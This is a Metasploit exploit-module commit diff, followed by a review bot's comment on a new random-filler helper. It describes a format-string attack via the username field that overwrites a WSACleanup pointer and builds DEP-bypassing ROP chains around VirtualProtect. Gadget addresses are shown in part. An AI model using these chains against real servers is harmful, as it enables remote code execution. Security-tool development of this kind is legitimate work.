Correct typo. Also make use of random junks.

unstable
sinn3r 2012-06-14 14:17:57 -05:00
parent 8e06babbba
commit b107025860
1 changed files with 8 additions and 5 deletions


@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
crafted format string specifier as a username. The crafted username is sent to to the server to
overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
The SEH exit function is prefered so that the administrators are not left with an unhandled
The SEH exit function is preferred so that the administrators are not left with an unhandled
exception message. When using the meterpreter payload, the process will never die, allowing
for continuous exploitation.
},
@ -100,6 +100,9 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
end
def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end
def exploit
@ -110,12 +113,12 @@ class Metasploit3 < Msf::Exploit::Remote
0x77be3adb, # pop eax ; retn
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # mov eax,[eax] ; pop ebp ; retn
0x41414141, # junk ------------^
junk,
0x77bb0c86, # xchg eax,esi ; retn
0x77be3adb, # pop eax ; retn
0xFFFFFBFF, # dwSize
0x77BAD64D, # neg eax ; pop ebp ; retn
0x41414141, # junk ------^
junk,
0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn
0x77bbfc02, # pop ecx ; retn
0x77bef001, # ptr that is w+
@ -137,14 +140,14 @@ class Metasploit3 < Msf::Exploit::Remote
0x77C21D16, # pop eax ; retn
0x77C11120, # <- *&VirtualProtect()
0x77C2E493, # mov eax,[eax] ; pop ebp ; retn
0x41414141, # junk ------------^
junk,
0x77C21891, # pop esi ; retn
0x77C5D010, # ptr that is w+
0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn
0x77C21D16, # pop eax ; retn
0xFFFFFBFF, # dwSize
0x77C1BE18, # neg eax ; pop ebp ; retn
0x41414141, # junk ------^
junk,
0x77C2362C, # pop ebx ; retn
0x77C5D010, # ptr that is w+
0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn
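Review bot: The `junk` helper introduced in the third hunk can yield nil rather than an integer: `rand_text_alpha(n).unpack("V").first` evaluates to `[nil].first` whenever `n` is below 4, and for `n` above 4 the surplus bytes are silently discarded, so the default argument is the only value that behaves as intended and a caller passing anything else would corrupt the array that consumes it. Either drop the parameter, `def junk; rand_text_alpha(4).unpack("V").first; end`, or guard it with `raise ArgumentError, "n must be 4" unless n == 4`; the explicit `return` is also unnecessary in Ruby. The `junk,` replacements in the last two hunks remove the `------^` comments that tied each filler slot to the preceding gadget, so a one-line comment such as `junk, # filler for the pop above` would keep that documentation. The `exploit` method whose body those hunks edit begins at the `def exploit` line and continues outside the shown hunks.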